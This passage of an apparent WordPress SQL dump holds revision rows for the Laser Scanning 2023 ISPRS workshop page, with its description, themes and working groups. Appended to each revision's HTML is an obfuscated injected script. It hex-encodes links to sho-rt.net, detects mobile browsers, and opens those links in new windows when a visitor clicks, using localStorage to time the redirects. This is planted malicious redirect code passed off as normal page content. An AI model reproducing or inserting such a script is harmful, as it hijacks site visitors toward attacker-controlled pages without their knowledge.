Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Laser Scanning 2023</strong>','','inherit','closed','closed','','2949-revision-v1','','','2022-11-02 16:49:33','2022-11-02 16:49:33','',2949,'https://gsw2023.com/?p=2967',0,'revision','',0),
(2968,1,'2022-11-02 16:50:28','2022-11-02 16:50:28','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2954\" img_size=\"1600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>Laser scanning 2023 is the 12th of a series of ISPRS workshops covering various aspects of space-borne, airborne, mobile and terrestrial laser scanning in， indoor, underground and outdoor environments. The workshop brings together experts who focus on processing and using point cloud data acquired from laser scanners and other active 3D imaging systems, such as range cameras and gaming sensors including terrestrial, mobile, aerial, unoccupied aerial and space-borne sensing platforms. Topics include all aspects related to sensor calibration, data acquisition and data processing including notably registration, feature extraction, classification, segmentation, object detection, big data processing, data fusion, 3D modelling, BIM and change analysis. The workshop will be part of the ISPRS Geospatial Week 2023 and in Cairo, Egypt in parallel with several related geospatial workshops. The event will be held as a two-day single-track workshop of oral presentations and poster sessions. </strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"pink\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/3\"][vc_single_image image=\"2953\" alignment=\"center\"][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"2950\" alignment=\"center\"][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"2955\" alignment=\"center\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><u>Chairs</u></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"54\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"pink\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:Blue;\"><strong><u>Themes of event:</u></strong></h5>\n<table width=\"0\">\n<tbody>\n<tr>\n<td width=\"288\">\n<h5><strong>Acquisition </strong></h5>\n<p>•      Airborne, terrestrial, automotive, bathymetric LIDAR</p>\n<p>•      Range imaging and gaming sensors</p>\n<p>•      Single Photon LIDAR, Multi-spectral LIDAR, Solid-state LIDAR</p>\n<p>•      Ubiquitous point cloud sensing and mapping</p>\n<p>&nbsp;</td>\n<td width=\"274\">\n<h5><strong>System and Signal analysis </strong></h5>\n<p>•      Sensor and system calibration and validation</p>\n<p>•      Error modelling</p>\n<p>•      Data fusion (LiDAR, RADAR, imagery)</p>\n<p>•      Denoising</p>\n<p>&nbsp;</td>\n</tr>\n<tr>\n<td width=\"288\">\n<h5><strong>Point Cloud Processing </strong></h5>\n<p>•      Point cloud registration &amp; denoising</p>\n<p>•      Segmentation</p>\n<p>•      Classification</p>\n<p>•      fusion</p>\n<p>•      3D Modelling</p>\n<p>•      Feature extraction and object recognition</p>\n<p>•      Change analysis</p>\n<p>•      Big Data processing</p>\n<p>•      Scan-to-BIM</p>\n<p>&nbsp;</td>\n<td width=\"274\">\n<h5><strong>Applications</strong></h5>\n<p>•        Thematic mapping and monitoring</p>\n<p>•        Modelling anthropogenic and natural areas</p>\n<p>•        Natural resource mapping</p>\n<p>•        Biodiversity assessment</p>\n<p>•        Precision farming</p>\n<p>•        Forest mapping and carbon storage</p>\n<p>•        Geohazards analysis</p>\n<p>•        Infrastructure monitoring</p>\n<p>•        Large-scale urban modelling</td>\n</tr>\n</tbody>\n</table>\n<p>&nbsp;</p>\n<p><u> </u></p>\n<p><u> </u></p>\n<p><u> </u></p>\n<h5 style=\"text-align:justify; color:Blue;\"><u>Scientific Committee:</u></h5>\n<p>tbc.</p>\n<p>&nbsp;</p>\n<h5 style=\"text-align:justify; color:Blue;\"><u>Supporting ISPRS Working Groups:</u></h5>\n<ul>\n<li>WG II/2 Point cloud acquisition and processing</li>\n</ul>\n<p><u> </u>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Laser Scanning 2023</strong>','','inherit','closed','closed','','2949-revision-v1','','','2022-11-02 16:50:28','2022-11-02 16:50:28','',2949,'https://gsw2023.com/?p=2968',0,'revision','',0),
(2969,1,'2022-11-02 16:51:31','2022-11-02 16:51:31','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2954\" img_size=\"1600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>Laser scanning 2023 is the 12th of a series of ISPRS workshops covering various aspects of space-borne, airborne, mobile and terrestrial laser scanning in， indoor, underground and outdoor environments. The workshop brings together experts who focus on processing and using point cloud data acquired from laser scanners and other active 3D imaging systems, such as range cameras and gaming sensors including terrestrial, mobile, aerial, unoccupied aerial and space-borne sensing platforms. Topics include all aspects related to sensor calibration, data acquisition and data processing including notably registration, feature extraction, classification, segmentation, object detection, big data processing, data fusion, 3D modelling, BIM and change analysis. The workshop will be part of the ISPRS Geospatial Week 2023 and in Cairo, Egypt in parallel with several related geospatial workshops. The event will be held as a two-day single-track workshop of oral presentations and poster sessions. </strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"pink\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/3\"][vc_single_image image=\"2953\" alignment=\"center\"][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"2950\" alignment=\"center\"][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"2955\" alignment=\"center\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><u>Chairs</u></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"54\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"pink\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:Blue;\"><strong><u>Themes of event:</u></strong></h5>\n<table width=\"0\">\n<tbody>\n<tr>\n<td width=\"288\">\n<h5><strong>Acquisition </strong></h5>\n<p>•      Airborne, terrestrial, automotive, bathymetric LIDAR</p>\n<p>•      Range imaging and gaming sensors</p>\n<p>•      Single Photon LIDAR, Multi-spectral LIDAR, Solid-state LIDAR</p>\n<p>•      Ubiquitous point cloud sensing and mapping</p>\n<p>&nbsp;</td>\n<td width=\"274\">\n<h5><strong>System and Signal analysis </strong></h5>\n<p>•      Sensor and system calibration and validation</p>\n<p>•      Error modelling</p>\n<p>•      Data fusion (LiDAR, RADAR, imagery)</p>\n<p>•      Denoising</p>\n<p>&nbsp;</td>\n</tr>\n<tr>\n<td width=\"288\">\n<h5><strong>Point Cloud Processing </strong></h5>\n<p>•      Point cloud registration &amp; denoising</p>\n<p>•      Segmentation</p>\n<p>•      Classification</p>\n<p>•      fusion</p>\n<p>•      3D Modelling</p>\n<p>•      Feature extraction and object recognition</p>\n<p>•      Change analysis</p>\n<p>•      Big Data processing</p>\n<p>•      Scan-to-BIM</p>\n<p>&nbsp;</td>\n<td width=\"274\">\n<h5><strong>Applications</strong></h5>\n<p>•        Thematic mapping and monitoring</p>\n<p>•        Modelling anthropogenic and natural areas</p>\n<p>•        Natural resource mapping</p>\n<p>•        Biodiversity assessment</p>\n<p>•        Precision farming</p>\n<p>•        Forest mapping and carbon storage</p>\n<p>•        Geohazards analysis</p>\n<p>•        Infrastructure monitoring</p>\n<p>•        Large-scale urban modelling</td>\n</tr>\n</tbody>\n</table>\n<p>&nbsp;</p>\n<p><u> </u></p>\n<p><u> </u></p>\n<p><u> </u></p>\n<h5 style=\"text-align:justify; color:Blue;\"><u>Scientific Committee:</u></h5>\n<p>tbc.</p>\n<p>&nbsp;</p>\n<h5 style=\"text-align:justify; color:Blue;\"><u>Supporting ISPRS Working Groups:</u></h5>\n<ul>\n<li>WG II/2 Point cloud acquisition and processing</li>\n</ul>\n<p><u> </u>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 